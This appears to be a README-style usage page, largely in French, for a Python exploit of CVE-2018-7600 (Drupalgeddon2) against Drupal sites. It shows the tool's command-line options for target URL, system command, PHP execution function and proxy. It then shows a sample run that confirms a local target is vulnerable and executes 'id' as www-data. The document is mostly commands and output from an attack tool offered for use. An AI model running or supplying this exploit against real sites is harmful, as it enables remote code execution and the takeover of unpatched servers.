
Exploit Python pour CVE-2018-7600 (Drupalgeddon2) permettant l'exécution de commandes à distance sur des sites Drupal vulnérables via une injection de propriété dans l'API Forms, avec test de vulnérabilité intégré et support de proxy.
$ python3 drupalgeddon.py -h
[+] drupalgeddon2 (CVE-2018-7600) exploit by Rafael Caria
usage: drupalgeddon.py [-h] --url URL [--command COMMAND] [--function FUNCTION] [--test] [--proxy PROXY]
[!] This script exploits (CVE-2018-7600) a Drupal property injection in the Forms API. Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.
optional arguments:
-h, --help affiche ce message d'aide et quitte
--url URL, -u URL URL du site Drupal cible (ex : http://target.com/)
--command COMMAND, -c COMMAND Commande système à exécuter
--function FUNCTION, -f FUNCTION Fonction à utiliser comme vecteur d'attaque (défaut = passthru)
--test Teste si la cible est vulnérable
--proxy PROXY, -p PROXY Configure un proxy au format http://127.0.0.1:8080/ (défaut = aucun)
$ python3 drupalgeddon.py -u http://127.0.0.1 --test -c id
[+] drupalgeddon2 (CVE-2018-7600) exploit by Rafael Caria
[+] Envoi de la requête à : http://127.0.0.1
[+] Test si : http://127.0.0.1 est vulnérable
[!] La cible est vulnérable à CVE-2018-7600
[+] Déclenchement de l'exploit pour exécuter : id
uid=33(www-data) gid=33(www-data) groups=33(www-data)